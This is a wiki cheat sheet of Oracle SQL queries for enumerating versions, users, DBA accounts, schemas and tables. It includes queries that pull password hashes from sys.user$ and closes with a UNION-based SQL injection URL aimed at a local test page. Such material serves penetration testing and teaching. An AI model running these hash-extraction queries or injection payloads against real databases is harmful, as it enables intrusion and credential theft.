1.1 Practical PL/SQL Examples

From UnixWiki
Revision as of 26 April 2012 at 16:20 by Futex

Version

 SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
 SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
 SELECT version FROM v$instance;

Current User

 SELECT user FROM dual;

List Users

 SELECT username FROM all_users ORDER BY username;
 SELECT name FROM sys.user$; -- priv (requires a privileged account)

List Password Hashes

 SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g; astatus tells you if the account is locked
 SELECT name, spare4 FROM sys.user$; -- priv, 11g

List DBA Accounts

 SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles

List Databases

 SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
 -- Also query TNS listener for other databases.  See tnscmd (services | status).

List Columns

 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List Tables

 SELECT table_name FROM all_tables;
 SELECT owner, table_name FROM all_tables;

String Concatenation

 SELECT 'A' || 'B' FROM dual; -- returns AB

Location of DB files

 SELECT name FROM V$DATAFILE;

Default/System Databases

 SYSTEM
 SYSAUX

Example of embedding a query in a SQL injection (returns the current user)

 http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL